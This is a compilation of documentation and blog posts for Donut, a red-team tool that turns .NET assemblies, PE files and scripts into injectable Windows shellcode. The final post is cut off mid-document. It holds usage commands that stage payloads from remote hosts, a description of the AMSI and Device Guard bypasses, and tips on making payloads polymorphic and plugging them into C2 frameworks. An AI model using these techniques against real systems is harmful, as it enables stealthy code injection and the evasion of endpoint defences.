0 | # Using Donut | |
1 | ||
2 | ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut") | |
3 | ||
4 | Version: 0.9.2 *please submit issues and requests for v1.0 release* | |
5 | ||
6 | Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/ | |
7 | ||
8 | TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/ | |
9 | ||
10 | v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/ | |
11 | ||
12 | ## Introduction | |
13 | ||
14 | Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
15 | ||
16 | It can be used in several ways. | |
17 | ||
18 | ## As a Standalone Tool | |
19 | ||
20 | Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below. | |
21 | ||
22 | ``` | |
23 | ||
24 | usage: donut [options] -f <EXE/DLL/VBS/JS/XSL> | |
25 | ||
26 | -MODULE OPTIONS- | |
27 | ||
28 | -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory. | |
29 | -u <URL> HTTP server that will host the donut module. | |
30 | ||
31 | -PIC/SHELLCODE OPTIONS- | |
32 | ||
33 | -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default). | |
34 | -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
35 | -o <payload> Output file. Default is "payload.bin" | |
36 | ||
37 | -DOTNET OPTIONS- | |
38 | ||
39 | -c <namespace.class> Optional class name. (required for .NET DLL) | |
40 | -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL) | |
41 | -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon. | |
42 | -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available. | |
43 | -d <name> AppDomain name to create for .NET. Randomly generated by default. | |
44 | ||
45 | examples: | |
46 | ||
47 | donut -f c2.dll | |
48 | donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll | |
49 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/ | |
50 | ||
51 | ``` | |
52 | ||
53 | ### Building Donut | |
54 | ||
55 | Tags have been provided for each release version of donut that contain the compiled executables. | |
56 | ||
57 | * v0.9.2, Bear Claw: | |
58 | * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2 | |
59 | * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1 | |
60 | * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9 | |
61 | ||
62 | However, you may also clone and build the source yourself using the provided makefiles. | |
63 | ||
64 | ## Building From Repository | |
65 | ||
66 | From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. | |
67 | ||
68 | ``` | |
69 | git clone http://github.com/thewover/donut | |
70 | cd donut | |
71 | ``` | |
72 | ||
73 | ## Linux | |
74 | ||
75 | Simply run make to generate an executable, static and dynamic libraries. | |
76 | ||
77 | ``` | |
78 | make | |
79 | make clean | |
80 | make debug | |
81 | ``` | |
82 | ||
83 | ## Windows | |
84 | ||
85 | Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsoft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commands to build donut: | |
86 | ||
87 | ``` | |
88 | nmake -f Makefile.msvc | |
89 | nmake clean -f Makefile.msvc | |
90 | nmake debug -f Makefile.msvc | |
91 | ``` | |
92 | ||
93 | ## As a Library | |
94 | ||
95 | donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ```. | |
96 | ||
97 | ## As a Python Module | |
98 | ||
99 | Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. | |
100 | ||
101 | ``` | |
102 | pip install . | |
103 | ``` | |
104 | ||
105 | Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repository. | |
106 | ||
107 | ``` | |
108 | pip install donut-shellcode | |
109 | ``` | |
110 | ||
111 | ## As a Template - Rebuilding the shellcode | |
112 | ||
113 | *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut. | |
114 | ||
115 | ### Microsoft Visual Studio | |
116 | ||
117 | **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.** | |
118 | ||
119 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
120 | ||
121 | ``` | |
122 | nmake clean -f Makefile.msvc | |
123 | nmake -f Makefile.msvc | |
124 | ``` | |
125 | ||
126 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
127 | ||
128 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
129 | ||
130 | ``` | |
131 | nmake clean -f Makefile.msvc | |
132 | nmake x86 -f Makefile.msvc | |
133 | ``` | |
134 | ||
135 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
136 | ||
137 | ### Mingw-w64 | |
138 | ||
139 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
140 | ||
141 | ``` | |
142 | make clean -f Makefile.mingw | |
143 | make -f Makefile.mingw | |
144 | ``` | |
145 | ||
146 | Once you've recompiled for all architectures, you may rebuild donut. | |
147 | ||
148 | ## Bypasses | |
149 | ||
150 | Donut includes a bypass system for AMSI and other security features. Currently we bypass: | |
151 | ||
152 | * AMSI in .NET v4.8 | |
153 | * Device Guard policy preventing dynamically generated code from executing | |
154 | ||
155 | You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c. | |
156 | ||
157 | Each bypass implements the DisableAMSI function with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used. | |
158 | ||
159 | Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. | |
160 | ||
161 | Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. | |
162 | ||
163 | If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. | |
164 | ||
165 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research. | |
166 | ||
167 | ### Additional features. | |
168 | ||
169 | These are left as exercises to the reader. I would personally recommend: | |
170 | ||
171 | * Add environmental keying | |
172 | * Make donut polymorphic by obfuscating *payload* every time shellcode is generated | |
173 | * Integrate donut as a module into your favorite RAT/C2 Framework | |
174 | ||
175 | ## Disclaimers | |
176 | ||
177 | * No, we will not update donut to counter signatures or detections by any AV. | |
178 | * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. | |
179 | ||
180 | # How it works | |
181 | ||
182 | ## Procedure for Assemblies | |
183 | ||
184 | Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. | |
185 | ||
186 | The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
187 | ||
188 | Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces | |
189 | ||
190 | For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader | |
191 | ||
192 | Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. | |
193 | ||
194 | ## Procedure for ActiveScript/XSL | |
195 | ||
196 | The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/). | |
197 | ||
198 | ## Procedure for PE Loading | |
199 | ||
200 | The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). | |
201 | ||
202 | ## Components | |
203 | ||
204 | Donut contains the following elements: | |
205 | ||
206 | * donut.c: The source code for the donut payload generator | |
207 | * donut.exe: The compiled payload generator as an EXE | |
208 | * donut.py: The donut payload generator as a Python script *(planned for version 1.0)* | |
209 | * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. | |
210 | * setup.py: The setup file for installing Donut as a Pip Python3 module. | |
211 | * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform | |
212 | * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform | |
213 | * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project | |
214 | * payload/payload.c: Main file for the shellcode. | |
215 | * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. | |
216 | * payload/inmem_pe.c: In-Memory loader for EXE/DLL files. | |
217 | * payload/inmem_xml.c: In-Memory loader for XSL/XML files. | |
218 | * payload/inmem_script.c: In-Memory loader for VBScript/JScript files. | |
219 | * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. | |
220 | * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support. | |
221 | * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP) | |
222 | * payload/http_client.c: Downloads a module from remote staging server into memory. | |
223 | * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). | |
224 | * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset. | |
225 | * payload/inject.exe: The compiled C shellcode injector | |
226 | * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing. | |
227 | * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible | |
228 | * payload/runsc.exe: The compiled C shellcode runner | |
229 | * payload/exe2h/exe2h.c: Source code for exe2h | |
230 | * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file | |
231 | * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. | |
232 | * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. | |
233 | ||
234 | # Subprojects | |
235 | ||
236 | There are three companion projects provided with donut: | |
237 | ||
238 | * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. | |
239 | * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. | |
240 | * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. | |
241 | * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. | |
242 | ||
243 | # Project plan | |
244 | ||
245 | * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~ | |
246 | * Create a C# version of the generator. | |
247 | * Create a donut.py generator that uses the same command-line parameters as donut.exe. | |
248 | * Add support for HTTP proxies. | |
249 | * ~~Find ways to simplify the shellcode if possible.~~ | |
250 | * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it. | |
251 | * ~~Dynamic Calls to DLL functions.~~ | |
252 | * Handle the ProcessExit event from AppDomain using unmanaged code. |
0 | # Python Extension | |
1 | ||
2 | A Python C extension is now available which allows you to dynamically generate donut shellcode in Python. | |
3 | ||
4 | ## Requirements | |
5 | ||
6 | The extension has only been tested in Python 3.7; it shouldn't have any compatibility issues with older 3.X versions of Python. | |
7 | ||
8 | It will ***not*** work in Python 2.x. | |
9 | ||
10 | ## Installing the Extension | |
11 | ||
12 | (Once the extension has been published to PyPi) | |
13 | ``` | |
14 | pip3 install donut-shellcode | |
15 | ``` | |
16 | ||
17 | ## Manually Compiling And Installing the Extension | |
18 | ||
19 | ```bash | |
20 | git clone https://github.com/TheWover/donut && cd donut | |
21 | pip3 install . # or python setup.py install | |
22 | ``` | |
23 | ||
24 | ## Usage | |
25 | ||
26 | The Python extension accepts the same parameters as the main donut executable. | |
27 | ||
28 | Here's a minimalistic example of using the extension: | |
29 | ||
30 | ```python | |
31 | import donut | |
32 | shellcode = donut.create(file="naga.exe", params='https://172.16.164.1/') | |
33 | ``` | |
34 | ||
35 | The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments. | |
36 | ||
37 | The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode. | |
38 | ||
39 | ```python | |
40 | import donut | |
41 | ||
42 | shellcode = donut.create( | |
43 | file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory | |
44 | url='http://127.0.0.1', # HTTP server that will host the donut module | |
45 | arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default) | |
46 | bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
47 | cls='namespace.class', # Optional class name. (required for .NET DLL) | |
48 | method='method', # Optional method or API name for DLL. (method is required for .NET DLL) | |
49 | params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon. | |
50 | runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available | |
51 | appdomain='name' # AppDomain name to create for .NET. Randomly generated by default. | |
52 | ) | |
53 | ``` | |
54 | ||
55 | ## Author | |
56 | ||
57 | The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r) |
0 | --- | |
1 | layout: post | |
2 | title: Donut v0.9.1 "Apple Fritter" - Dual-Mode Shellcode, AMSI, and More | |
3 | --- | |
4 | ||
5 | *TLDR: Version v0.9.1 "Apple Fritter" of Donut has been released, including dual-mode (AMD64+x86) shellcode, AMSI bypassing for .NET v4.8, automatic version detection of payloads, better support for Program.Main().* | |
6 | ||
7 | # Introduction | |
8 | ||
9 | In case you are unaware, [Donut](https://github.com/TheWover/donut "Donut") is a shellcode generation tool that creates native shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
10 | ||
11 | Today, we released version v0.9.1. The major features include: | |
12 | ||
13 | * Dual-Mode shellcode that can run in either x64 or x86 (WOW64) processes. | |
14 | * Automatic detection of the CLR version required for .NET Assembly payloads. | |
15 | * AMSI bypassing for version .NET 4.8 that ensures all Assemblies can be safely loaded. | |
16 | * Modular system for adding bypasses. Your choice of bypass functionality is compiled into payload.exe based on compiler flags. | |
17 | * Bypass for Device Guard policy preventing execution of dynamically generated .NET code | |
18 | * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings | |
19 | ||
20 | # Feature Breakdown | |
21 | ||
22 | ## Dual-Mode Shellcode | |
23 | ||
24 | Odzhan knew an old trick for crafting shellcode that can run in either x86 or x64 Windows processes using REX prefixes. We combine the x86 and x64 shellcode with a stub that "detects" the architecture of the process. The layout in memory looks like: | |
25 | ||
26 | ``` | |
27 | -------------------------------------------------- | |
28 | | detection stub | x64 shellcode | x86 shellcode | | |
29 | -------------------------------------------------- | |
30 | ``` | |
31 | ||
32 | And the logic: | |
33 | ||
34 | ```assembly | |
35 | 0x31C0 xor eax, eax // null eax | |
36 | 0x48 dec eax // decrement eax to produce an underflow | |
37 | 0x0F88 js dword x86_code // jump to x86 payload if we are in a WOW64 process | |
38 | <x64_code> // the x64 PIC machine code for the payload | |
39 | <x86_code> // the x86 PIC machine code for the payload | |
40 | ``` | |
41 | ||
42 | There are two ways this code can execute. | |
43 | ||
44 | If the process is WOW64 (x86): | |
45 | ||
46 | 1) ```eax``` will be nulled. | |
47 | 2) ```eax``` will be decremented, resulting in an underflow. | |
48 | 3) Since the sign flag is set from the underflow, the condition for the jump is satisfied. Jump to the x86 shellcode. | |
49 | ||
50 | If the process is x64: | |
51 | ||
52 | 1) ```eax``` will be nulled. | |
53 | 2) ```0x48``` is a REX prefix for the next instruction | |
54 | 3) The previous REX prefix is not valid for the ```js``` instruction. As such, nothing happens. | |
55 | 4) Since the x64 PIC is immediately following the previous instruction in memory, ```eip``` is now pointing at the first instruction in the x64 PIC. It now executes. | |
56 | ||
57 | Starting in the v0.9.1 "Apple Fritter" release, dual-mode shellcode is the default. You may still tell Donut to produce x86 or x64 shellcode, rather than AMD64+x86. | |
58 | ||
59 | Naturally, the dual-mode PIC will be larger than the other options. If the size of the PIC matters, use the version for the particular process you are targeting. Or, have your injector check the architecture of the target process before injecting into it. If not, use the dual-mode version to ensure maximum compatibility with host processes. | |
60 | ||
61 | ## Auto-Detect CLR Version | |
62 | ||
63 | Rather than require the user to specify the CLR version, we now read the headers of the .NET Assembly to determine the appropriate CLR version. | |
64 | ||
65 | The .NET Assembly file format is an extension of the regular [PE Format](https://en.wikipedia.org/wiki/Portable_Executable) used by Windows executables. One of the optional fields used by .NET is the ```IMAGE_COR20_HEADER```, which references a ```STORAGESIGNATURE``` structure containing the version details necessary to load the correct runtime. We check the ```iVersionString``` variable to get the exact version requirement for your Assembly. Please note, the names of these data structures and variables are somewhat arbitrary. I am borrowing [dnSpy's](https://github.com/0xd4d/dnSpy) terminology so that I can show you these two pretty pictures. | |
66 | ||
67 | The relevant layout of the .NET headers in my SafetyKatz DLL as stored on disk: | |
68 | ||
69 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/headers_in_PE.PNG) | |
70 | ||
71 | And what the ```STORAGESIGNATURE``` structure actually looks like: | |
72 | ||
73 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/structured_headers.PNG) | |
74 | ||
75 | If you do not want us to automatically determine the version number, you may still manually specify what version to use with the `-r` flag. | |
76 | ||
77 | ||
78 | ## Main Entry Point | |
79 | ||
80 | The original version of Donut did not handle Main entry points for EXEs well due to the fact that it uses an object array as its function signature rather than a string array. We now correctly handle this so that you don't have to know about the difference. :-) | |
81 | ||
82 | ## AMSI Patching | |
83 | ||
84 | To provide some context, AMSI integration has been added to the new version of the .NET Framework. It has also been ported to [.NET Core](https://github.com/dotnet/coreclr/issues/21370). | |
85 | ||
86 | Specifically, AMSI integration was added to the CLR itself so that any .NET Assemblies loaded from memory will be scanned with ```AmsiScanBuffer``` from ```amsi.dll``` before they are loaded. If the result of ```AmsiScanBuffer``` is anything but ```S_OK``` it will return an ```HRESULT``` error code. This affects everything that loads Assemblies from memory using the CLR, including ```System.Reflection.Assembly.Load```, Donut shellcode, and (presumably if I could test it) Cobalt Strike's ```execute-assembly``` command. | |
87 | ||
88 | When you try to load a .NET Assembly from memory that is known to be malicious, you get a Defender alert that looks like the picture below. Notice that data source was AMSI, and that the process it was running in is ```notepad.exe```. The assembly was injected into notepad through Donut shellcode. | |
89 | ||
90 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/donut_AMSI.PNG) | |
91 | ||
92 | However, their implementation of AMSI integration is subject to memory patching bypasses in the same way that PowerShell is. We built on existing research, produced some custom bypasses, and added a modular bypass system to Donut that lets you choose which technique you would like to use. | |
93 | ||
94 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) detailing each of the AMSI bypasses we added to Donut. It is important to note that there could be many more. I believe that anyone who sits down to do the research and develop an AMSI bypass will probably come up with their own slightly different variant. As long as Microsoft continues to rely on calling DLL functions from user-level memory space, AMSI will be subject to memory patching bypasses. | |
95 | ||
96 | The result looks like the picture below. I safely injected SafetyKatz into ```notepad.exe``` using Donut shellcode, even though AMSI was used. Defender shows no detections. | |
97 | ||
98 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/amsi_is_dead.PNG) | |
99 | ||
100 | I must strongly emphasize, the fact that 4.8 AMSI can be bypassed like in PowerShell does NOT make it useless. This new AMSI is a *good thing* that will benefit .NET Security. It incurs cost upon adversaries. Use it. But also recognise that, like everything, it has its limitations. | |
101 | ||
102 | ### Modular Bypass System | |
103 | ||
104 | As we researched bypasses for AMSI, it became clear that there are many ways to do it. It would be silly to force users of Donut to have to use whatever we came up with. As such, we ensured that you may easily add your own bypass or customize one of ours. The bypasses are defined in ```payload/bypass.c```. You may either modify our C code, or add your own. Each bypass implements the same ```BOOL DisableAMSI(PDONUT_INSTANCE inst)``` function and is wrapped in an ```#ifdef BYPASS_NAME``` preprocessor directive. To change which bypass is used, change the Makefile to define the bypass name specified by the directive. | |
105 | ||
106 | For example, you could change the relevant line in ```payload/Makefile.msvc``` from | |
107 | ||
108 | ``` | |
109 | cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c | |
110 | ``` | |
111 | ||
112 | To: | |
113 | ||
114 | ``` | |
115 | cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c | |
116 | ``` | |
117 | ||
118 | In order to switch from using BypassA to BypassB. | |
119 | ||
120 | This system not only makes it easy to change the bypass technique, but also reduces the size, complexity, and signaturability of the shellcode by ensuring that code you are not using is not present in the PIC to be found by AV/EDR. | |
121 | ||
122 | ## Device Guard Dynamic Code Prevention Bypass | |
123 | ||
124 | Windows Defender Device Guard includes an optional policy for disabling dynamically-generated .NET code from executing. Because it was mixed-in with the AMSI scanning code, we went ahead and disabled it too. Not sure if that will help anyone, but hey it was easy. ¯\_(ツ)_/¯ | |
125 | ||
126 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/code_integrity.png) | |
127 | ||
128 | # Conclusion | |
129 | ||
130 | Donut v0.9.1 "Apple Fritter" represents the first improvements to Donut. More improvements are coming as we have time to make them. In the meantime, Donut is still in Beta so we welcome feedback and testing. | |
131 | ||
132 | I know that several people have already had difficulties integrating Donut into their toolsets because of the complexity of the data structures it uses. To help with this, our plan for the full release (version 1.0) is to produce C# and Python generators. That will be the primary focus of our efforts moving forward. | |
133 | ||
134 | ## Plans | |
135 | ||
136 | Below is the current version release plan for Donut. | |
137 | ||
138 | * v0.9.1: | |
139 |     * Dual-Mode shellcode that can run in either x64 or x86 (WOW64) processes. | |
140 | * Automatic detection of the CLR version required for .NET Assembly payloads. | |
141 |     * AMSI bypassing for version .NET 4.8 that ensures all Assemblies can be safely loaded. | |
142 |     * Modular system for adding bypasses. Your choice of bypass functionality is compiled into payload.exe based on compiler flags. | |
143 | * Bypass for Device Guard policy preventing execution of dynamically generated .NET code | |
144 | * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings | |
145 | * v1.0: | |
146 | * C# generator | |
147 | * C# wrapper for our dynamic library | |
148 | * Python generator | |
149 | * Python wrapper for our dynamic library | |
150 | * Better documentation for debugging, designing with, and integrating Donut. | |
151 | * v1.1: | |
152 | * Automatic unloading of Application Domains after the Assembly finishes executing. | |
153 | * Support for HTTP proxies |
0 | --- | |
1 | layout: post | |
2 | title: Donut - Injecting .NET Assemblies as Shellcode | |
3 | --- | |
4 | ||
5 | *TLDR: You can now inject .NET Assemblies into Windows processes using this repo: https://github.com/TheWover/donut/* | |
6 | ||
7 | # Advancing Tradecraft - Context | |
8 | ||
9 | Offensive and red team tradecraft have changed significantly in the past year. As anti-malware systems improve their capability to detect and deter offensive tools, attackers are shifting their focus to technologies that are not observed by AV. Currently, that means operating entirely in memory and avoiding dropping files onto disk. In the Windows world, the .NET Framework provides a convenient mechanism for this. It is, however, severely restricted in that .NET programs cannot be injected directly into remote processes. In this article, we will address this issue by describing how to inject .NET code into processes via shellcode. | |
10 | ||
11 | ## .NET Primer | |
12 | ||
13 | Before we begin, you must understand a few important components of .NET. | |
14 | ||
15 | <details> | |
16 | <summary>Click to expand the primer!</summary> | |
17 | ||
18 | * [Common Language Runtime](https://docs.microsoft.com/en-us/dotnet/standard/clr "Common Language Runtime"): Like Java, .NET uses a runtime environment (or "virtual machine") to interpret code at runtime. All .NET Code is compiled from an intermediate language to native code "Just-In-Time" before execution. | |
19 | * [Common Intermediate Language](https://docs.microsoft.com/en-us/dotnet/standard/managed-code "Common Intermediate Language"): Speaking of an intermediate language, .NET uses CIL (also known as MSIL). All .NET languages (of which there are many) are "assembled" to this intermediate language. CIL is a generic object-oriented assembly language that can be interpreted into machine code for any hardware architecture. As such, the designers of .NET languages do not need to design their compilers around the architectures they will run on. Instead, they merely need to design it to compile to one language: CIL. | |
20 | * [.NET Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/assemblies-in-the-common-language-runtime ".NET Assemblies"): .NET applications are packaged into .NET Assemblies. They are so called because the code from your language of choice has been "assembled" into CIL but not truly compiled. Assemblies use an extension of the PE format and are represented as either an EXE or a DLL that contains CIL rather than native machine code. | |
21 | * [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains "Application Domains"): Assemblies are run inside of a safe "box" known as an Application Domain. Multiple Assemblies can exist within an AppDomain, and multiple AppDomains can exist within a process. AppDomains are intended to provide the same level of isolation between executing Assemblies as is normally provided for processes. Threads may move between AppDomains and can share objects through marshalling and delegates. | |
22 | </details> | |
23 | ||
24 | ## Current state of .NET Tradecraft | |
25 | ||
26 | Currently, .NET tradecraft is limited to post-exploitation execution by one of two main ways: | |
27 | ||
28 | * Assembly.Load(): The .NET Framework's standard library includes an API for [code reflection](https://en.wikipedia.org/wiki/Reflection_(computer_programming)). This Reflection API includes System.Reflection.Assembly.Load, which can be used to load .NET programs from memory. In less than five lines of code, you may load a .NET DLL or EXE from memory and execute it. | |
29 | * execute-assembly: In Cobalt Strike 3.11, Raphael Mudge introduced a command called 'execute-assembly' that ran .NET Assemblies from memory as if they were run from disk. This command introduced the world to .NET tradecraft and signalled the shift to [Bringing Your Own Land](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html). | |
30 | ||
31 | However, both execution vectors produce challenges for red teams seeking to develop flexible TTPs. | |
32 | ||
33 | ## Assembly.Load | |
34 | ||
35 | While the Reflection API is very versatile and can be useful in many different ways, it can only run code in the current process. No support is provided for running payloads in remote processes. | |
36 | ||
37 | ## execute-assembly | |
38 | ||
39 | The main problem with execute-assembly is that it executes the same way every time. That predictability ensures that it is reliable, but also lets defenders build analytics. | |
40 | ||
41 | 1. A subprocess is created using the *spawnto* executable. Mudge refers to this as a "sacrificial process" because it acts as a host for your payloads, isolating your Beacon's process from any failure in your code. | |
42 | 2. A reflective DLL is injected into the subprocess to load the .NET Runtime. | |
43 | 3. The reflective DLL loads an intermediate .NET Assembly to handle errors and improve the stability of your payload. | |
44 | 4. The intermediate .NET Assembly loads your .NET Assembly from memory inside the subprocess. | |
45 | 5. The main entry point of your Assembly is invoked along with your command-line arguments. | |
46 | ||
47 | The result is that execute-assembly *does* allow you to inject your .NET Assembly into a remote process. However, it does not let you inject into a running process or specify how that injection occurs. It is only modular in *what* you can run, not *how* you can run it. The most that you can do is to specify what executable is run for your sacrificial subprocess by changing the *spawnto* variable in your Malleable C2 Profile. execute-assembly also has a hidden size limitation of 1 MB for your payloads, which limits your flexibility in designing post-exploitation tools. | |
48 | ||
49 | ## Moving Forward | |
50 | ||
